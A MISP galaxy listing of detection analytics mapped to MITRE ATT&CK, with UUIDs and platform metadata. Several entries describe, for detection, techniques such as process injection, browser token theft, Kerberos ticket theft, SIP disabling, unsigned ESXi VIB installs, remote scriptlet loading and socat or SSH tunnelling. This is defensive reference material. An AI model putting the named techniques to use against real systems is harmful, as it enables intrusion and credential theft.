UUID 20157d55-1760-483c-a3b1-c6e219eeb75c which can be used as unique global reference for Analytic 1396 - AN1396 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1396
mitre_platforms ['macOS']

Analytic 1963 - AN1963

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 24e641ec-e64a-4f2c-91b1-8bd400e97547 which can be used as unique global reference for Analytic 1963 - AN1963 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1963
mitre_platforms ['PRE']

Analytic 1369 - AN1369

Detection of adversary behavior that disables or modifies security tools, including killing AV/EDR processes, stopping services, altering Sysmon registry keys, or tampering with exclusion lists. Defenders observe process/service termination, registry modification, and abnormal absence of expected telemetry.

Internal MISP references

UUID 7faf6f37-f074-4b9d-be19-618c3516486d which can be used as unique global reference for Analytic 1369 - AN1369 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1369
mitre_platforms ['Windows']

Analytic 1639 - AN1639

SSH login detected via Unified Logs, followed by unusual process execution, especially outside normal user behavior patterns.

Internal MISP references

UUID 9c8ba5cd-40db-4214-8db1-b03b2d7b1690 which can be used as unique global reference for Analytic 1639 - AN1639 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1639
mitre_platforms ['macOS']

Analytic 1693 - AN1693

When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Developers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice. (Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks) On Android, users may be presented with a popup to select the appropriate application to open the URI in. If the user sees an application they do not recognize, they can remove it.

Internal MISP references

UUID 5e90ac48-345b-445a-877f-596737ad7efb which can be used as unique global reference for Analytic 1693 - AN1693 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1693
mitre_platforms ['Android']

Analytic 1377 - AN1377

Creation of outbound connections on alternate ports or using covert transport (e.g., ICMP, DNS) from non-network-intensive processes, following known disruption or blocked traffic.

Internal MISP references

UUID a50c90f1-51b1-4948-8945-4b89735d4750 which can be used as unique global reference for Analytic 1377 - AN1377 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1377
mitre_platforms ['Linux']

Analytic 1737 - AN1737

The user can review which applications have location and sensitive phone information permissions in the operating system’s settings menu. Application vetting services can detect unnecessary and potentially abused API calls. Application vetting services can detect unnecessary and potentially abused permissions.

Internal MISP references

UUID 31d95dc7-aec7-47a2-bbb4-8b20ca3bc184 which can be used as unique global reference for Analytic 1737 - AN1737 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1737
mitre_platforms ['Android']

Analytic 1773 - AN1773

In iOS 14 and up, an orange dot (or orange square if the Differentiate Without Color setting is enabled) appears in the status bar when the microphone is being used by an application. However, there have been demonstrations indicating it may still be possible to access the microphone in the background without triggering this visual indicator by abusing features that natively access the microphone or camera but do not trigger the visual indicators.(Citation: iOS Mic Spyware)

In Android 12 and up, a green dot appears in the status bar when the microphone is being used by an application.(Citation: Android Privacy Indicators) Android applications using the RECORD_AUDIO permission and iOS applications using RequestRecordPermission should be carefully reviewed and monitored. If the CAPTURE_AUDIO_OUTPUT permission is found in a third-party Android application, the application should be heavily scrutinized.

In both Android (6.0 and up) and iOS, the user can review which applications have the permission to access the microphone through the device settings screen and revoke permissions as necessary.

Internal MISP references

UUID 4623e949-e902-4a8c-893b-73e5ab4b57d5 which can be used as unique global reference for Analytic 1773 - AN1773 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1773
mitre_platforms ['iOS']

Analytic 1378 - AN1378

Outbound fallback traffic from low-profile or background launch agents using unusual protocols or destinations after primary channel inactivity.

Internal MISP references

UUID 3e682b33-5064-4202-aad7-ca1900fde1a5 which can be used as unique global reference for Analytic 1378 - AN1378 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1378
mitre_platforms ['macOS']

Analytic 1387 - AN1387

Abuse of VMFS or ESXi shell to hide datastore files, renaming/moving VMDK or VMX files into hidden directories. Defender view: anomalous ESXi shell commands or file operations obscuring VM artifacts.

Internal MISP references

UUID a3c087a6-b7dc-464f-9e84-278bf3076ed1 which can be used as unique global reference for Analytic 1387 - AN1387 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1387
mitre_platforms ['ESXi']

Analytic 1738 - AN1738

The user can review which applications have location and sensitive phone information permissions in the operating system’s settings menu. Application vetting services can detect unnecessary and potentially abused API calls. Application vetting services can detect unnecessary and potentially abused permissions.

Internal MISP references

UUID 28304317-cbde-45cd-bf0b-99b5cd8d1478 which can be used as unique global reference for Analytic 1738 - AN1738 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1738
mitre_platforms ['iOS']

Analytic 1783 - AN1783

Application vetting services could look for android.permission.READ_CONTACTS in an Android application’s manifest, or NSContactsUsageDescription in an iOS application’s Info.plist file. Most applications do not need contact list access, so extra scrutiny could be applied to those that request it. On both Android and iOS, the user can manage which applications have permission to access the contact list through the device settings screen, revoking the permission if necessary.

Internal MISP references

UUID 6f77061e-d663-487d-bfca-cd1e1f1d24d7 which can be used as unique global reference for Analytic 1783 - AN1783 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1783
mitre_platforms ['iOS']

Analytic 1837 - AN1837

Application vetting services can detect which broadcast intents an application registers for and which permissions it requests.

Internal MISP references

UUID fbc0a210-8942-4fcb-81f1-a120551013d4 which can be used as unique global reference for Analytic 1837 - AN1837 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1837
mitre_platforms ['Android']

Analytic 1937 - AN1937

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 3b25198c-e31d-4e0c-9d26-eb8e714c71a8 which can be used as unique global reference for Analytic 1937 - AN1937 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1937
mitre_platforms ['PRE']

Analytic 1379 - AN1379

Outbound traffic from host management services or guest-to-host interactions over unusual interfaces (e.g., backdoor API endpoints or external VPN tunnels).

Internal MISP references

UUID 5e7eea18-14f5-4d76-b5cc-bc63a0e5ce65 which can be used as unique global reference for Analytic 1379 - AN1379 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1379
mitre_platforms ['ESXi']

Analytic 1973 - AN1973

Monitor for suspicious network traffic that could be indicative of probing for user information, such as large/iterative quantities of authentication requests originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.

Internal MISP references

UUID dc58724a-18a9-4bb9-a901-f5630963095b which can be used as unique global reference for Analytic 1973 - AN1973 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1973
mitre_platforms ['PRE']

Analytic 1397 - AN1397

Detection of mshta.exe execution where command-line arguments reference remote or local HTA/script content (VBScript/JScript) followed by subsequent file creation, network retrieval, or process spawning that indicates payload execution outside standard Internet Explorer security context. Correlation includes parent process lineage, command-line inspection, and network connection creation to untrusted or anomalous endpoints.

Internal MISP references

UUID e6037bea-ba25-40bf-b681-361d4f901adb which can be used as unique global reference for Analytic 1397 - AN1397 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1397
mitre_platforms ['Windows']

Analytic 1793 - AN1793

Abuse of standard application protocols can be difficult to detect as many legitimate mobile applications leverage such protocols for language-specific APIs. Enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID d11da2b2-1552-4a54-b268-3df1cb877cf6 which can be used as unique global reference for Analytic 1793 - AN1793 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1793
mitre_platforms ['Android']

Analytic 1739 - AN1739

On Android, Verified Boot can detect unauthorized modifications to the system partition.(Citation: Android-VerifiedBoot) Android's SafetyNet API provides remote attestation capabilities, which could potentially be used to identify and respond to compromised devices. Samsung Knox provides a similar remote attestation capability on supported Samsung devices.

Internal MISP references

UUID e8bfbaf2-cfa8-41fd-a5ee-48b57026ac7c which can be used as unique global reference for Analytic 1739 - AN1739 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1739
mitre_platforms ['Android']

Analytic 1388 - AN1388

Malicious macros or embedded objects hidden within Office documents by renaming streams or using hidden OLE objects. Defender view: detection of hidden macro streams or objects in documents correlated with anomalous execution.

Internal MISP references

UUID a6299804-cf50-4496-a242-1394ff89c147 which can be used as unique global reference for Analytic 1388 - AN1388 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1388
mitre_platforms ['Office Suite']

Analytic 1838 - AN1838

Application vetting services could detect applications trying to modify files in protected parts of the operating system. Verified Boot can detect unauthorized modifications to the system partition.(Citation: Android-VerifiedBoot) Android’s SafetyNet API provides remote attestation capabilities, which could potentially be used to identify and respond to compromised devices. Samsung Knox provides a similar remote attestation capability on supported Samsung devices.

Internal MISP references

UUID fdb6acce-e069-4e35-8a4b-f4517924f092 which can be used as unique global reference for Analytic 1838 - AN1838 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1838
mitre_platforms ['Android']

Analytic 1389 - AN1389

Detects the execution of non-browser processes establishing outbound encrypted network connections using uncommon symmetric encryption protocols (e.g., AES via PowerShell or custom scripts) to alternate external destinations.

Internal MISP references

UUID 4e5ffb58-75de-4305-a439-98ca3499f45e which can be used as unique global reference for Analytic 1389 - AN1389 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1389
mitre_platforms ['Windows']

Analytic 1983 - AN1983

Monitor and analyze traffic patterns and packet inspection associated with protocol(s) that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous process execution and command-line arguments associated with traffic patterns (e.g., monitor anomalies in use of files that do not normally initiate connections for the respective protocol(s)). Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: Spearphishing via Service).

Internal MISP references

UUID 9301fed2-1abe-4250-85b0-7794431e9034 which can be used as unique global reference for Analytic 1983 - AN1983 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1983
mitre_platforms ['PRE']

Analytic 1398 - AN1398

Adversary gains high integrity or special privileges (e.g., SeDebugPrivilege), locates a running browser process, opens it with write/inject rights, and modifies it (e.g., CreateRemoteThread / DLL load) to inherit cookies/tokens or establish a browser pivot. Optional step: create a new logon session or use explicit credentials, then drive the victim browser to intranet resources.

Internal MISP references

UUID c3629243-7cd6-4e56-9275-73f5752f0f08 which can be used as unique global reference for Analytic 1398 - AN1398 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1398
mitre_platforms ['Windows']

Analytic 1938 - AN1938

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID cf5aa9ca-0f1b-4707-94af-484228fd6199 which can be used as unique global reference for Analytic 1938 - AN1938 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1938
mitre_platforms ['PRE']

Analytic 1839 - AN1839

Application vetting services could detect applications trying to modify files in protected parts of the operating system. Verified Boot can detect unauthorized modifications to the system partition.(Citation: Android-VerifiedBoot) Android’s SafetyNet API provides remote attestation capabilities, which could potentially be used to identify and respond to compromised devices. Samsung Knox provides a similar remote attestation capability on supported Samsung devices.

Internal MISP references

UUID 98b0a8a6-881d-4f00-84c3-3f70d368067e which can be used as unique global reference for Analytic 1839 - AN1839 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1839
mitre_platforms ['iOS']

Analytic 1399 - AN1399

Detects process injection by correlating memory manipulation API calls (e.g., VirtualAllocEx, WriteProcessMemory), suspicious thread creation (e.g., CreateRemoteThread), and unusual DLL loads within another process's context.

Internal MISP references

UUID 337976cc-5fd5-49e8-abcb-79f27d19382c which can be used as unique global reference for Analytic 1399 - AN1399 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1399
mitre_platforms ['Windows']

Analytic 1939 - AN1939

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID a9a66c41-1b05-41fc-a866-272848b051ff which can be used as unique global reference for Analytic 1939 - AN1939 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1939
mitre_platforms ['PRE']

Analytic 1993 - AN1993

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: Phishing).

Internal MISP references

UUID ab74118c-05e1-4acd-b1c2-445d1f7c5fd1 which can be used as unique global reference for Analytic 1993 - AN1993 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1993
mitre_platforms ['PRE']

Analytic 1444 - AN1444

Detects suspicious access to SSSD secrets database and Kerberos key material indicating ticket theft or replay attempts. Correlates anomalous file access with unusual Kerberos service ticket requests.

Internal MISP references

UUID c101374a-ce7a-46d7-b7d4-c64fbdf1f685 which can be used as unique global reference for Analytic 1444 - AN1444 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1444
mitre_platforms ['Linux']

Analytic 1544 - AN1544

Detection of valid account misuse through SSH logins, sudo/su abuse, and service account anomalies outside expected patterns.

Internal MISP references

UUID 6cf46787-028d-4ac8-9dfa-58682edb3625 which can be used as unique global reference for Analytic 1544 - AN1544 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1544
mitre_platforms ['Linux']

Analytic 1454 - AN1454

Execution of system info utilities like systemsetup, sw_vers, uname, or sysctl by terminal or scripted processes.

Internal MISP references

UUID 85a20f4b-4171-4450-a34f-17725d44aad9 which can be used as unique global reference for Analytic 1454 - AN1454 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1454
mitre_platforms ['macOS']

Analytic 1445 - AN1445

Detects attempts to forge or replay Kerberos tickets by monitoring Unified Logs for anomalous kinit/klist activity and correlating unusual authentication sequences.

Internal MISP references

UUID c08ad617-cc0d-4435-9168-08c762048503 which can be used as unique global reference for Analytic 1445 - AN1445 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1445
mitre_platforms ['macOS']

Analytic 1446 - AN1446

Monitors execution of administrative utilities (e.g., bcdedit.exe) or registry modifications that disable Driver Signature Enforcement (DSE) or enable Test Signing. Correlates command-line activity, registry changes, and subsequent process executions that bypass signing enforcement.

Internal MISP references

UUID 83067587-4426-44cb-89de-f2b948c91104 which can be used as unique global reference for Analytic 1446 - AN1446 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1446
mitre_platforms ['Windows']

Analytic 1464 - AN1464

Execution of PubPrn.vbs via cscript.exe using the 'script:' moniker to load and execute a remote .sct scriptlet file, bypassing signature validation and proxying remote payloads through a signed Microsoft script host.

Internal MISP references

UUID e7444be7-3c0a-4ff2-927d-f623af05936d which can be used as unique global reference for Analytic 1464 - AN1464 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1464
mitre_platforms ['Windows']

Analytic 1644 - AN1644

Application vetting services may detect API calls to performGlobalAction(int). The user can view a list of device administrators and applications that have registered accessibility services in device settings. The user can typically visually see when an action happens that they did not initiate and can subsequently review installed applications for any out of place or unknown ones. Applications that register an accessibility service or request device administrator permissions should be scrutinized further for malicious behavior.

Internal MISP references

UUID 23a1b062-847e-4912-8e5e-5b69867af4a4 which can be used as unique global reference for Analytic 1644 - AN1644 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1644
mitre_platforms ['Android']

Analytic 1447 - AN1447

Detects modification of System Integrity Protection (SIP) or code signing enforcement policies through csrutil or kernel variable tampering. Correlates execution of csrutil disable commands with subsequent policy state changes and anomalous unsigned process executions.

Internal MISP references

UUID 7853421f-8eb4-49c3-9943-077430b97037 which can be used as unique global reference for Analytic 1447 - AN1447 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1447
mitre_platforms ['macOS']

Analytic 1474 - AN1474

Unauthorized modification of TCC.db followed by elevated process execution under a trusted parent (e.g., Finder, SystemUIServer) or via launchctl environment override. Also includes identification of SIP being disabled, which is highly uncommon and a prerequisite for this abuse path.

Internal MISP references

UUID c0766f2c-e282-44a1-8dcf-1575d77658da which can be used as unique global reference for Analytic 1474 - AN1474 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1474
mitre_platforms ['macOS']

Analytic 1744 - AN1744

When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Developers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice.(Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks) On Android, users may be presented with a popup to select the appropriate application to open a URI in. If the user sees an application they do not recognize, they can remove it.

Internal MISP references

UUID 8a463850-89e6-4de8-bd8d-20fd70dff959 which can be used as unique global reference for Analytic 1744 - AN1744 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1744
mitre_platforms ['iOS']

Analytic 1448 - AN1448

A remote host sends a short sequence of failed connection attempts (RST/ICMP unreachable) to a set of closed ports. Within a brief window the endpoint (a) adds/enables a firewall rule or (b) a sniffer-backed process begins listening or opens a new socket, after which a successful connection occurs. Also detects Wake-on-LAN magic packets seen on the local segment.

Internal MISP references

UUID 0848a778-7bcf-48d9-a14a-d29d1e71e656 which can be used as unique global reference for Analytic 1448 - AN1448 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1448
mitre_platforms ['Windows']

Analytic 1484 - AN1484

sshd, socat, or custom binaries initiating port forwarding or encapsulating traffic (e.g., RDP, SMB) through SSH or HTTP. Defender sees abnormal connect/bind syscalls, encrypted traffic on ports typically used for non-encrypted services, and outlier traffic volume patterns.

Internal MISP references

UUID 5acd81f3-466a-472d-bb1f-9bda231ac4c0 which can be used as unique global reference for Analytic 1484 - AN1484 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1484
mitre_platforms ['Linux']

Analytic 1844 - AN1844

Unexpected behavior from an application could be an indicator of masquerading. Application vetting services may potentially determine if an application contains suspicious code and/or metadata.

Internal MISP references

UUID ff9c219a-b8e7-4b0a-8ea5-4f81341375d1 which can be used as unique global reference for Analytic 1844 - AN1844 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1844
mitre_platforms ['iOS']

Analytic 1944 - AN1944

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 240a8cec-0e3a-44ed-a485-4d212a21b127 which can be used as unique global reference for Analytic 1944 - AN1944 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1944
mitre_platforms ['PRE']

Analytic 1449 - AN1449

Closed-port knock sequence from a remote IP followed by an on-host firewall change (iptables/nftables) or a daemon starting to listen (socket open), and then a successful TCP/UDP connect. Optional detection of libpcap/raw-socket sniffers spawning to watch for secret values.

Internal MISP references

UUID 2e7a9609-3e4b-477b-828f-f486561d7fa7 which can be used as unique global reference for Analytic 1449 - AN1449 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1449
mitre_platforms ['Linux']

Analytic 1494 - AN1494

Detects adversary behavior where a process enumerates and modifies another process's memory using /proc/[pid]/maps and /proc/[pid]/mem files. This includes identifying gadgets via memory mappings and overwriting process memory via low-level file modification or dd usage.

Internal MISP references

UUID 3a57e109-235d-497a-9c90-952ab8b749b6 which can be used as unique global reference for Analytic 1494 - AN1494 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1494
mitre_platforms ['Linux']

Analytic 1455 - AN1455

Execution of esxcli system hostname get, esxcli system version get, or esxcli hardware commands through SSH or local shell.

Internal MISP references

UUID 164a04c5-db61-477f-b3fa-8bf806631fbb which can be used as unique global reference for Analytic 1455 - AN1455 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1455
mitre_platforms ['ESXi']

Analytic 1554 - AN1554

ESXi hypervisor environmental validation behavioral chain: (1) Virtual machine inventory and configuration enumeration through vim-cmd and esxcli commands, (2) Host hardware and network configuration discovery for hypervisor environment validation, (3) Datastore and storage configuration reconnaissance, (4) vCenter connectivity and cluster membership validation, (5) Selective malware deployment based on virtualization infrastructure characteristics and target VM validation.

Internal MISP references

UUID 1cd8c844-575a-44be-9fee-80cd988dc781 which can be used as unique global reference for Analytic 1554 - AN1554 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1554
mitre_platforms ['ESXi']

Analytic 1545 - AN1545

Detection of interactive and remote logins by service accounts or users at unusual times, with unexpected child process activity.

Internal MISP references

UUID d059a437-bf45-4b10-a36c-7e42e183d3c7 which can be used as unique global reference for Analytic 1545 - AN1545 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1545
mitre_platforms ['macOS']

Analytic 1465 - AN1465

Unusual or suspicious processes loading critical native API DLLs (e.g., ntdll.dll, kernel32.dll) followed by direct syscall behavior, memory manipulation, or hollowing.

Internal MISP references

UUID 2a23296d-70f2-4e04-9a97-62d093ad1765 which can be used as unique global reference for Analytic 1465 - AN1465 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1465
mitre_platforms ['Windows']

Analytic 1546 - AN1546

Detection of valid account abuse in IdP logs via geographic anomalies, impossible travel, risky sign-ins, and multiple MFA attempts or failures.

Internal MISP references

UUID aa255cdc-0b49-4ad3-951d-eab5582da56f which can be used as unique global reference for Analytic 1546 - AN1546 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1546
mitre_platforms ['Identity Provider']

Analytic 1456 - AN1456

Use of cloud API calls (e.g., AWS EC2 DescribeInstances, Azure VM Inventory) to enumerate system configurations across assets.

Internal MISP references

UUID d664b158-5035-4e0b-a069-7a5b27ce0936 which can be used as unique global reference for Analytic 1456 - AN1456 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1456
mitre_platforms ['IaaS']

Analytic 1564 - AN1564

Detection of Office or document viewer processes (e.g., winword.exe) initiating network connections to remote templates or executing scripts due to manipulated template references (e.g., embedded in .docx, .rtf, or .dotm files), followed by suspicious child process creation (e.g., PowerShell).

Internal MISP references

UUID dea5f6cc-d3bb-404b-8aab-f7366988a96e which can be used as unique global reference for Analytic 1564 - AN1564 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1564
mitre_platforms ['Windows']

Analytic 1654 - AN1654

Integrity checking mechanisms can potentially detect unauthorized hardware modifications.

Internal MISP references

UUID 53491f5a-7062-41f0-a51d-07b52dc8192c which can be used as unique global reference for Analytic 1654 - AN1654 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1654
mitre_platforms ['iOS']

Analytic 1645 - AN1645

The user can view the default SMS handler in system settings.

Internal MISP references

UUID a69604d3-2909-46bf-afd3-39b47ac5e5fd which can be used as unique global reference for Analytic 1645 - AN1645 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1645
mitre_platforms ['Android']

Analytic 1457 - AN1457

Execution of show version, show hardware, or show system commands through CLI via SSH or console.

Internal MISP references

UUID 3ff23082-b5c6-47c0-8d76-a2d6fa88e622 which can be used as unique global reference for Analytic 1457 - AN1457 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1457
mitre_platforms ['Network Devices']

Analytic 1574 - AN1574

Unusual ESXi processes (vmx, hostd) reading datastore files and generating outbound HTTPS traffic toward external cloud storage endpoints. Defender perspective: anomalous datastore activity followed by network transfers to Dropbox, AWS S3, or other storage services.

Internal MISP references

UUID 682f84f1-5571-4d41-b071-53c8f72a88f1 which can be used as unique global reference for Analytic 1574 - AN1574 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1574
mitre_platforms ['ESXi']

Analytic 1475 - AN1475

Malicious VIB installation for persistence via esxcli software vib install using --force or --no-sig-check, enabling custom startup scripts or firewall rules. Behavior chain: (1) unsigned/suspicious VIB installation → (2) startup script or binary placed in persistent boot path → (3) persistence across reboot via /etc/rc.local.d or other boot hook.

Internal MISP references

UUID 9696a221-35b9-4576-ae75-714c902c2889 which can be used as unique global reference for Analytic 1475 - AN1475 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1475
mitre_platforms ['ESXi']

Analytic 1547 - AN1547

Detection of containerized service accounts or compromised kubeconfigs being used for cluster access from unexpected nodes or IPs.

Internal MISP references

UUID dc062a09-572e-41fc-bfff-f654751a6a0f which can be used as unique global reference for Analytic 1547 - AN1547 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1547
mitre_platforms ['Containers']

Analytic 1754 - AN1754

Network carriers may be able to use firewalls, Intrusion Detection Systems (IDS), or Intrusion Prevention Systems (IPS) to detect and/or block SS7 exploitation.(Citation: CSRIC5-WG10-FinalReport) The CSRIC also suggests threat information sharing between telecommunications industry members.

Internal MISP references

UUID 9bc8daed-e8ea-4c70-95bc-dcb2905b33d3 which can be used as unique global reference for Analytic 1754 - AN1754 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1754
mitre_platforms ['iOS']

Analytic 1745 - AN1745

On Android, the user can use the device settings menu to view trusted CA certificates and look for unexpected or unknown certificates. A mobile security product could similarly examine the trusted CA certificate store for anomalies. Users can use the device settings menu to view which applications on the device are allowed to install unknown applications.

On iOS, the user can use the device settings menu to view installed Configuration Profiles and look for unexpected or unknown profiles. A Mobile Device Management (MDM) system could use the iOS MDM APIs to examine the list of installed Configuration Profiles for anomalies.

Internal MISP references

UUID b972ebf0-16d1-4bc2-980b-e8cb0947affa which can be used as unique global reference for Analytic 1745 - AN1745 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1745
mitre_platforms ['Android']

Analytic 1485 - AN1485

launchd or user-invoked processes (ssh, socat) encapsulating traffic via SSH tunnels, VPN-style tooling, or DNS-over-HTTPS clients. Defender sees outbound TLS traffic with embedded DNS or RDP payloads.

Internal MISP references

UUID 359ab8ab-f306-4e67-8ff4-f8e1c8ec7db3 which can be used as unique global reference for Analytic 1485 - AN1485 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1485
mitre_platforms ['macOS']

Analytic 1548 - AN1548

Adversary installs or side-loads an IDE extension (VS Code, IntelliJ/JetBrains, Eclipse) or enables IDE tunneling. Chain: (1) IDE binary starts on a non-developer endpoint or server, often with install/force/tunnel flags → (2) extension files/registrations appear under user profile → (3) browser/IDE initiates outbound connections to extension marketplaces, update endpoints, or IDE remote/tunnel services → (4) optional child tools (ssh, node, powershell) execute under the IDE context.

Internal MISP references

UUID 539a4182-ab9e-4abf-a83b-f30cf2dec770 which can be used as unique global reference for Analytic 1548 - AN1548 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1548
mitre_platforms ['Windows']

Analytic 1458 - AN1458

Detects adversarial archiving of files prior to exfiltration by correlating execution of compression/encryption utilities (e.g., makecab.exe, rar.exe, 7z.exe, powershell Compress-Archive) with subsequent creation of large compressed or encrypted files. Identifies abnormal process lineage involving crypt32.dll usage, command-line arguments invoking compression switches, and file write operations to temporary or staging directories.

Internal MISP references

UUID eaeb2a44-eebe-41f3-875a-a34abdc03252 which can be used as unique global reference for Analytic 1458 - AN1458 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1458
mitre_platforms ['Windows']

Analytic 1584 - AN1584

Use of bash scripts or interactive shells to issue sequential ping, arp, or traceroute commands to map remote hosts.

Internal MISP references

UUID f794d2f4-ad8e-4e11-b374-2c35f8ca38e9 which can be used as unique global reference for Analytic 1584 - AN1584 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1584
mitre_platforms ['Linux']

Analytic 1845 - AN1845

The OS may show a notification to the user that the Signal or WhatsApp account has been linked to a new device.

Internal MISP references

UUID 42ce5243-8859-49dc-b221-2674536063ff which can be used as unique global reference for Analytic 1845 - AN1845 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
